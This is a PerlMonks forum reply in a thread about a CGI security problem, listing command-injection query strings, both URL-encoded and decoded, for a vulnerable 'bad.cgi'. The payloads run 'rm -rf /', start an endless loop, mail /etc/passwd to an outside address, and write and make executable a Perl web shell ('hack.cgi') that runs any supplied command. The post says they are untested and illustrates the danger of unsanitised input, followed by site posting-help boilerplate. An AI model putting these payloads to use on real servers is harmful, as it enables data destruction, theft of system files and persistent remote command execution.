bad.cgi?var%3Dtext%3B%60rm%20-rf%20%2F%60

or

bad.cgi?var%3Dtext%3Bwarn%20%27ha%27%20while%201

or

bad.cgi?var%3Dtext%3B%60mail%20%3C%20%2Fetc%2Fpasswd%20me%40isp.com%60

or

bad.cgi?var%3Dtext%3B%60echo%20%27%23%21%2Fusr%2Flocal%2Fbin%2Fperl%27
+%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27use%20CGI%20qw%2F%3Aall%2F%3B%27%20%
+3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27%24cmd%20%3D%20param%28%22cmd%22%29%
+3B%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20header%2Cstart_html%3B%20%3E
+%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20%5C%60%24cmd%5C%60%2C%20end_
+html%3B%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60chmod%20%2Bx%20hack.cgi%60

[download]
Which are the equivalents of: 
bad.cgi?var=text;`rm -rf /`

or

bad.cgi?var=text;warn 'ha' while 1

or

bad.cgi?var=text;`mail < /etc/passwd me@isp.com`

or

bad.cgi?var=text;`echo '#!/usr/local/bin/perl' > hack.cgi`
bad.cgi?var=text;`echo 'use CGI qw/:all/;' > hack.cgi`
bad.cgi?var=text;`echo '$cmd = param("cmd");' > hack.cgi`
bad.cgi?var=text;`echo 'print header,start_html; > hack.cgi`
bad.cgi?var=text;`echo 'print \`$cmd\`, end_html; > hack.cgi`
bad.cgi?var=text;`chmod +x hack.cgi`

[download]
I have not tested this, though. :-) 
--
Casey
   I am a superhero.

In reply to Re: Can we top this security problem? by cwest
in thread Can we top this security problem? by swiftone

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post, it's "PerlMonks-approved HTML":


  • Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
  • Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
  • Read Where should I post X? if you're not absolutely sure you're posting in the right place.
  • Please read these before you post! —
  • Posts may use any of the Perl Monks Approved HTML tags:
    a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
  • You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
            For:     Use:
    & &amp;
    < &lt;
    > &gt;
    [ &#91;
    ] &#93;
  • Link using PerlMonks shortcuts! What shortcuts can I use for linking?
  • See Writeup Formatting Tips and other pages linked from there for more info.